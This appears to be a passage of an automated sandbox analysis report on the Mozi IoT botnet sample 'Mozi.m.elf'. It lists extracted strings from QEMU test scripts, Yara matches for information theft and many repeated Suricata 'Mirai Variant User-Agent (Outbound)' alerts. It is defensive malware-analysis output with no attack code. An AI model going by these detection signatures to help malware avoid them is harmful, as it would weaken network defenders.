                            Source: kvm-test-1-run.sh.14.drBinary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: qemu_pid=""
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: elif test -z "$qemu_pid"
                            Source: functions.sh2.14.drBinary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
                            Source: Mozi.m.elf, 6226.1.0000557659616000.0000557659768000.rw-.sdmp, Mozi.m.elf, 6228.1.0000557659616000.0000557659768000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
                            Source: functions.sh2.14.drBinary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
                            Source: kvm.sh.14.drBinary or memory string: --qemu-args|--qemu-arg)
                            Source: kvm.sh.14.drBinary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
                            Source: kvm.sh.14.drBinary or memory string: TORTURE_QEMU_MEM="$TORTURE_QEMU_MEM"; export TORTURE_QEMU_MEM
                            Source: functions.sh2.14.drBinary or memory string: echo $TORTURE_QEMU_CMD
                            Source: kvm.sh.14.drBinary or memory string: TORTURE_QEMU_MAC=$2
                            Source: kvm.sh.14.drBinary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
                            Source: kvm.sh.14.drBinary or memory string: TORTURE_QEMU_MEM=$2
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: vcpus=`identify_qemu_vcpus`
                            Source: functions.sh2.14.drBinary or memory string: specify_qemu_cpus () {
                            Source: functions.sh2.14.drBinary or memory string: qemu-system-i386)
                            Source: functions.sh2.14.drBinary or memory string: qemu-system-ppc64)
                            Source: functions.sh2.14.drBinary or memory string: # identify_boot_image qemu-cmd
                            Source: kvm.sh.14.drBinary or memory string: TORTURE_QEMU_ARG="$2"
                            Source: Mozi.m.elf, 6226.1.0000557659616000.0000557659768000.rw-.sdmp, Mozi.m.elf, 6228.1.0000557659616000.0000557659768000.rw-.sdmpBinary or memory string: bYvU!/etc/qemu-binfmt/arm
                            Source: kvm.sh.14.drBinary or memory string: print "needqemurun="
                            Source: functions.sh2.14.drBinary or memory string: # qemu-args already contains "-smp".
                            Source: functions.sh2.14.drBinary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
                            Source: functions.sh2.14.drBinary or memory string: echo Cannot figure out what qemu command to use! 1>&2
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: QEMU="`identify_qemu $base_resdir/vmlinux`"
                            Source: functions.sh2.14.drBinary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
                            Source: functions.sh2.14.drBinary or memory string: # identify_qemu_vcpus
                            Source: kvm.sh.14.drBinary or memory string: TORTURE_QEMU_CMD="$2"
                            Source: functions.sh2.14.drBinary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
                            Source: functions.sh2.14.drBinary or memory string: # identify_qemu_args qemu-cmd serial-file
                            Source: functions.sh2.14.drBinary or memory string: if test -n "$TORTURE_QEMU_CMD"
                            Source: kvm.sh.14.drBinary or memory string: --qemu-cmd)
                            Source: kvm.sh.14.drBinary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: qemu_args="-enable-kvm -nographic $qemu_args"
                            Source: functions.sh2.14.drBinary or memory string: # identify_qemu builddir
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
                            Source: functions.sh2.14.drBinary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: if test -s "$resdir/qemu_pid"

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: 6226.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6228.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORY
                            Source: Yara matchFile source: Mozi.m.elf, type: SAMPLE
                            Source: Yara matchFile source: /usr/networks, type: DROPPED
                            Source: Yara matchFile source: 6226.1.00007fd22c060000.00007fd22c06a000.rw-.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6228.1.00007fd22c060000.00007fd22c06a000.rw-.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Mozi.m.elf PID: 6226, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Mozi.m.elf PID: 6228, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
